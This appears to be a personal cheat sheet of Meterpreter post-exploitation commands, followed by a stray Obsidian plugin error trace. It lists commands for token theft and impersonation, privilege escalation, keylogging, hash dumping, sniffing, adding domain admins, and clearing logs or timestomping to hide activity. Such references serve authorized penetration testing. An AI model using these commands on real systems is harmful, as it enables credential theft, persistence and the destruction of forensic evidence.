Meterpreter
Command | Description |
---|---|
help | Open Meterpreter usage help. |
run <scriptname> | Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory. |
sysinfo | Show the system information on the compromised target. |
ls | List the files and folders on the target. |
use priv | Load the privilege extension for extended Meterpreter libraries. |
ps | Show all running processes and which accounts are associated with each process. |
migrate <proc. id> | Migrate to the specific process ID (PID is the target process ID gained from the ps command). |
use incognito | Load incognito functions. (Used for token stealing and impersonation on a target machine.) |
list_tokens -u | List available tokens on the target by user. |
list_tokens -g | List available tokens on the target by group. |
impersonate_token <DOMAIN_NAMEUSERNAME> | Impersonate a token available on the target. |
steal_token <proc. id> | Steal the tokens available for a given process and impersonate that token. |
drop_token | Stop impersonating the current token. |
getsystem | Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors. |
shell | Drop into an interactive shell with all available tokens. |
execute -f <cmd.exe> -i | Execute cmd.exe and interact with it. |
execute -f <cmd.exe> -i -t | Execute cmd.exe with all available tokens. |
execute -f <cmd.exe> -i -H -t | Execute cmd.exe with all available tokens and make it a hidden process. |
rev2self | Revert back to the original user you used to compromise the target. |
reg <command> | Interact, create, delete, query, set, and much more in the target’s registry. |
setdesktop <number> | Switch to a different screen based on who is logged in. |
screenshot | Take a screenshot of the target’s screen. |
upload <filename> | Upload a file to the target. |
download <filename> | Download a file from the target. |
keyscan_start | Start sniffing keystrokes on the remote target. |
keyscan_dump | Dump the remote keys captured on the target. |
keyscan_stop | Stop sniffing keystrokes on the remote target. |
getprivs | Get as many privileges as possible on the target. |
uictl enable <keyboard/mouse> | Take control of the keyboard and/or mouse. |
background | Run your current Meterpreter shell in the background. |
hashdump | Dump all hashes on the target. use sniffer Load the sniffer module. |
sniffer_interfaces | List the available interfaces on the target. |
sniffer_dump <interfaceID> pcapname | Start sniffing on the remote target. |
sniffer_start <interfaceID> packet-buffer | Start sniffing with a specific range for a packet buffer. |
sniffer_stats <interfaceID> | Grab statistical information from the interface you are sniffing. |
sniffer_stop <interfaceID> | Stop the sniffer. |
add_user <username> <password> -h <ip> | Add a user on the remote target. |
add_group_user <"Domain Admins"> <username> -h <ip> | Add a username to the Domain Administrators group on the remote target. |
clearev | Clear the event log on the target machine. |
timestomp | Change file attributes, such as creation date (antiforensics measure). |
reboot | Reboot the target machine. |
Failure
Error: There is another generation process
plugin:obsidian-textgenerator-plugin:56949 TextGenerator.eval plugin:obsidian-textgenerator-plugin:56949:31
Generator.next
plugin:obsidian-textgenerator-plugin:78 eval plugin:obsidian-textgenerator-plugin:78:61
new Promise
plugin:obsidian-textgenerator-plugin:62 __async plugin:obsidian-textgenerator-plugin:62:10
plugin:obsidian-textgenerator-plugin:56935 TextGenerator.generate plugin:obsidian-textgenerator-plugin:56935:12
plugin:obsidian-textgenerator-plugin:58440 AutoSuggest.eval plugin:obsidian-textgenerator-plugin:58440:52
Generator.next
plugin:obsidian-textgenerator-plugin:78 eval plugin:obsidian-textgenerator-plugin:78:61
new Promise